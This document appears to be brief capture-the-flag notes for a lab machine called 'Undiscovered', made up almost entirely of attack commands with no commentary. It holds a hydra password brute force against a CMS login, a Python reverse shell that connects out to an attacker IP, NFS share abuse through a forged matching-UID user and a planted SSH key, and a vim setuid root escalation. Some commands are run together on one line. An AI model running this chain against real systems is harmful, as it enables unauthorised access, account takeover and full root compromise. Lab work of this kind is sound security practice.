Undiscovered
Nmap
sudo nmap 10.10.144.20 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18
111/tcp open rpcbind 2-4 (RPC #100000)
2049/tcp open nfs 2-4 (RPC #100003)
35619/tcp open nlockmgr 1-4 (RPC #100021)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://undiscovered.thm" -H "Host: FUZZ.undiscovered.thm" -t 42 --hl 9 
<IP> booking.undiscovered.thm
<IP> deliver.undiscovered.thm

python3 dirsearch.py -u deliver.undiscovered.thm -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 75 --full-url 


hydra -l admin -P /usr/share/wordlists/rockyou.txt deliver.undiscovered.thm http-post-form "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong" 




python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.3.108",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

mkdir /mountpoint
sudo mount -t nfs undiscovered.thm:/home/william /mountpoint

sudo adduser william --home /home/william --shell /bin/bash --uid 3003

ssh-keygen -t rsamkdir /mountpoint/.sshecho 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnkejs7hzvX7ZyEMNckFFyhIWW4DvIHmQGlgqjkbIOjy4Z78VdAWDS27A/Z452X0di9h2TKuBUZKFh8x1z9hHV6XW6vtVtP4hhdesBDs9jG69weJwBwbJcQBLU9jJp/1Wjf6cn00LBSW1CcAakvE6mNgkUfe2puhlQMeo4EbtRp9qkIMDwIufeazi0+xFQSZkGs7KtaJr5XH24lw8Cf3P7deo9bgbvyhVqTomnZ39/9/yWS1/WiPxiMNJlHHLdGRzkyKWFpANbcmWGF9EGc+2jx3GKCmi5GeIdQVJM6Yj5Sy1bkmg6S6YvZWZ2JJg/Z7pa9Bl9/vvruypdQwuT34WqRskr7UYeERB9TFrC/gDgVQsqWjXs9OJInx4bGIbbXwTE0gZqRP3NaRUqD1Iair2gHlwrvxLERNJ7bt3jHOXdkto6DOz9HDyJzrrd82nCdwUIqPR5p2efPN0D33Ko/gQy486DwnWwBq+PHMhbEOHS99auL6xHFs/ja0xo2qOT4Hk= kali@kali' > authorized_keysssh william@undiscovered.thm


chmod 600 id_rsa


/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Last updated
